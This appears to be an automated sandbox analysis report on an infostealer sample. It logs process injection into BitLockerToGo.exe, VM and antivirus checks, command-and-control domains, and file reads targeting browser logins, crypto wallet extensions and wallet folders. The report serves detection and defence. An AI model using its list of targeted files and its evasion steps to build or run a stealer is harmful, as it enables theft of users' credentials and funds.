            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSystem information queried: HandleInformationJump to behavior
            Source: C:\Users\user\Desktop\6wFwugeLNG.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: BitLockerToGo.exe, 00000005.00000003.2438535689.0000000004E2A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: 6wFwugeLNG.exeReversingLabs: Detection: 68%
            Source: 6wFwugeLNG.exeVirustotal: Detection: 43%
            Source: 6wFwugeLNG.exeString found in binary or memory: @v1.5.6/loadconfig.go
            Source: unknownProcess created: C:\Users\user\Desktop\6wFwugeLNG.exe "C:\Users\user\Desktop\6wFwugeLNG.exe"
            Source: C:\Users\user\Desktop\6wFwugeLNG.exeProcess created: C:\Windows\SysWOW64\reg.exe reg query HKEY_CURRENT_USER\Software\Google\Chrome\BLBeacon /v version
            Source: C:\Windows\SysWOW64\reg.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\6wFwugeLNG.exeProcess created: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
            Source: C:\Users\user\Desktop\6wFwugeLNG.exeProcess created: C:\Windows\SysWOW64\reg.exe reg query HKEY_CURRENT_USER\Software\Google\Chrome\BLBeacon /v versionJump to behavior
            Source: C:\Users\user\Desktop\6wFwugeLNG.exeProcess created: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"Jump to behavior
            Source: C:\Users\user\Desktop\6wFwugeLNG.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\Desktop\6wFwugeLNG.exeSection loaded: winmm.dllJump to behavior
            Source: C:\Users\user\Desktop\6wFwugeLNG.exeSection loaded: powrprof.dllJump to behavior
            Source: C:\Users\user\Desktop\6wFwugeLNG.exeSection loaded: umpdc.dllJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: webio.dllJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: schannel.dllJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: mskeyprotect.dllJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: ntasn1.dllJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: ncrypt.dllJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: ncryptsslp.dllJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: 6wFwugeLNG.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
            Source: 6wFwugeLNG.exeStatic file information: File size 11141120 > 1048576
            Source: 6wFwugeLNG.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x2d5000
            Source: 6wFwugeLNG.exeStatic PE information: Raw size of .rdata is bigger than: 0x100000 < 0x2cba00
            Source: 6wFwugeLNG.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
            Source: Binary string: BitLockerToGo.pdb source: 6wFwugeLNG.exe, 00000000.00000002.2391891785.000000000A100000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: BitLockerToGo.pdbGCTL source: 6wFwugeLNG.exe, 00000000.00000002.2391891785.000000000A100000.00000004.00001000.00020000.00000000.sdmp
            Source: 6wFwugeLNG.exeStatic PE information: section name: .symtab
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 5_2_00489B90 push eax; mov dword ptr [esp], D9DADBDCh5_2_00489B9E
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 5_2_0048C7B0 push eax; mov dword ptr [esp], 5251500Fh5_2_0048C7B4
            Source: C:\Users\user\Desktop\6wFwugeLNG.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\6wFwugeLNG.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\conhost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion

            barindex
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSystem information queried: FirmwareTableInformationJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe TID: 6776Thread sleep time: -180000s >= -30000sJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
            Source: BitLockerToGo.exe, 00000005.00000003.2459955388.0000000004E28000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696487552
            Source: BitLockerToGo.exe, 00000005.00000003.2459955388.0000000004E28000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696487552|UE
            Source: BitLockerToGo.exe, 00000005.00000003.2459955388.0000000004E28000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696487552u
            Source: BitLockerToGo.exe, 00000005.00000003.2459955388.0000000004E28000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696487552f
            Source: BitLockerToGo.exe, 00000005.00000003.2459955388.0000000004E28000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696487552x
            Source: BitLockerToGo.exe, 00000005.00000003.2459955388.0000000004E28000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696487552}
            Source: BitLockerToGo.exe, 00000005.00000002.2592679688.00000000006BC000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000005.00000002.2592679688.00000000006E6000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000005.00000003.2591264065.00000000006BC000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000005.00000003.2591264065.00000000006E6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
            Source: BitLockerToGo.exe, 00000005.00000003.2459955388.0000000004E28000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696487552
            Source: BitLockerToGo.exe, 00000005.00000003.2459955388.0000000004E28000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696487552
            Source: BitLockerToGo.exe, 00000005.00000003.2459955388.0000000004E2D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: - GDCDYNVMware20,11696487552p
            Source: BitLockerToGo.exe, 00000005.00000003.2459955388.0000000004E28000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696487552
            Source: BitLockerToGo.exe, 00000005.00000003.2459955388.0000000004E28000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696487552
            Source: BitLockerToGo.exe, 00000005.00000003.2459955388.0000000004E28000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696487552o
            Source: BitLockerToGo.exe, 00000005.00000003.2459955388.0000000004E28000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696487552
            Source: 6wFwugeLNG.exe, 00000000.00000002.2388284827.0000000000508000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
            Source: BitLockerToGo.exe, 00000005.00000003.2459955388.0000000004E28000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696487552d
            Source: BitLockerToGo.exe, 00000005.00000003.2459955388.0000000004E28000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696487552
            Source: BitLockerToGo.exe, 00000005.00000003.2459955388.0000000004E28000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696487552j
            Source: BitLockerToGo.exe, 00000005.00000003.2459955388.0000000004E28000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696487552]
            Source: BitLockerToGo.exe, 00000005.00000003.2459955388.0000000004E28000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696487552x
            Source: BitLockerToGo.exe, 00000005.00000003.2459955388.0000000004E28000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696487552
            Source: BitLockerToGo.exe, 00000005.00000003.2459955388.0000000004E28000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696487552h
            Source: BitLockerToGo.exe, 00000005.00000003.2459955388.0000000004E28000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696487552z
            Source: BitLockerToGo.exe, 00000005.00000003.2459955388.0000000004E28000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696487552~
            Source: BitLockerToGo.exe, 00000005.00000003.2459955388.0000000004E28000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696487552t
            Source: BitLockerToGo.exe, 00000005.00000003.2459955388.0000000004E28000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696487552^
            Source: BitLockerToGo.exe, 00000005.00000003.2459955388.0000000004E28000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696487552p
            Source: BitLockerToGo.exe, 00000005.00000003.2459955388.0000000004E28000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696487552n
            Source: BitLockerToGo.exe, 00000005.00000003.2459955388.0000000004E28000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696487552s
            Source: BitLockerToGo.exe, 00000005.00000003.2459955388.0000000004E28000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696487552
            Source: BitLockerToGo.exe, 00000005.00000003.2459955388.0000000004E28000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696487552t
            Source: BitLockerToGo.exe, 00000005.00000003.2459955388.0000000004E28000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696487552x
            Source: BitLockerToGo.exe, 00000005.00000003.2459955388.0000000004E28000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696487552}
            Source: BitLockerToGo.exe, 00000005.00000003.2459955388.0000000004E28000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696487552
            Source: BitLockerToGo.exe, 00000005.00000002.2592679688.00000000006E6000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000005.00000003.2591264065.00000000006E6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWD
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 5_2_0048AFD0 LdrInitializeThunk,5_2_0048AFD0

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Source: C:\Users\user\Desktop\6wFwugeLNG.exeMemory allocated: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 450000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\6wFwugeLNG.exeMemory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 450000 value starts with: 4D5AJump to behavior
            Source: 6wFwugeLNG.exe, 00000000.00000002.2391539251.0000000009E4A000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: debonairnukk.xyz
            Source: 6wFwugeLNG.exe, 00000000.00000002.2391539251.0000000009E4A000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: diffuculttan.xyz
            Source: 6wFwugeLNG.exe, 00000000.00000002.2391539251.0000000009E4A000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: effecterectz.xyz
            Source: 6wFwugeLNG.exe, 00000000.00000002.2391539251.0000000009E4A000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: deafeninggeh.biz
            Source: 6wFwugeLNG.exe, 00000000.00000002.2391539251.0000000009E4A000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: immureprech.biz
            Source: 6wFwugeLNG.exe, 00000000.00000002.2391539251.0000000009E4A000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: cycahao.shop
            Source: C:\Users\user\Desktop\6wFwugeLNG.exeMemory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 288008Jump to behavior
            Source: C:\Users\user\Desktop\6wFwugeLNG.exeMemory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 450000Jump to behavior
            Source: C:\Users\user\Desktop\6wFwugeLNG.exeMemory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 451000Jump to behavior
            Source: C:\Users\user\Desktop\6wFwugeLNG.exeMemory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 48F000Jump to behavior
            Source: C:\Users\user\Desktop\6wFwugeLNG.exeMemory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 492000Jump to behavior
            Source: C:\Users\user\Desktop\6wFwugeLNG.exeMemory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 4A2000Jump to behavior
            Source: C:\Users\user\Desktop\6wFwugeLNG.exeMemory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 4A3000Jump to behavior
            Source: C:\Users\user\Desktop\6wFwugeLNG.exeProcess created: C:\Windows\SysWOW64\reg.exe reg query HKEY_CURRENT_USER\Software\Google\Chrome\BLBeacon /v versionJump to behavior
            Source: C:\Users\user\Desktop\6wFwugeLNG.exeProcess created: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"Jump to behavior
            Source: C:\Users\user\Desktop\6wFwugeLNG.exeQueries volume information: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\6wFwugeLNG.exeQueries volume information: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe VolumeInformationJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
            Source: BitLockerToGo.exe, 00000005.00000003.2533275611.0000000000767000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

            Stealing of Sensitive Information

            barindex
            Source: Yara matchFile source: Process Memory Space: BitLockerToGo.exe PID: 612, type: MEMORYSTR
            Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
            Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
            Source: BitLockerToGo.exe, 00000005.00000003.2508284325.000000000074E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Wallets/Electrum
            Source: BitLockerToGo.exe, 00000005.00000003.2508284325.000000000074E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Wallets/ElectronCash
            Source: BitLockerToGo.exe, 00000005.00000003.2508325530.0000000000758000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Jaxx Liberty
            Source: BitLockerToGo.exe, 00000005.00000003.2508284325.000000000074E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: window-state.json
            Source: BitLockerToGo.exe, 00000005.00000003.2508284325.000000000074E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Wallets/Exodus
            Source: BitLockerToGo.exe, 00000005.00000003.2508284325.000000000074E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Wallets/Ethereum
            Source: BitLockerToGo.exe, 00000005.00000003.2508284325.000000000074A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
            Source: BitLockerToGo.exe, 00000005.00000003.2508284325.000000000074E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: keystore
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\logins.jsonJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfeJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihdJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbbJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblbJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cert9.dbJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchhJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihohJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbicJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilcJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofecJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpoJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimnJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgppJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpaJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbchJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpiJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmjJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjpJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoaddJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaadJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclgJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkmJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdafJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapacJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpakJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbchJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbgJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifbJump to behavior
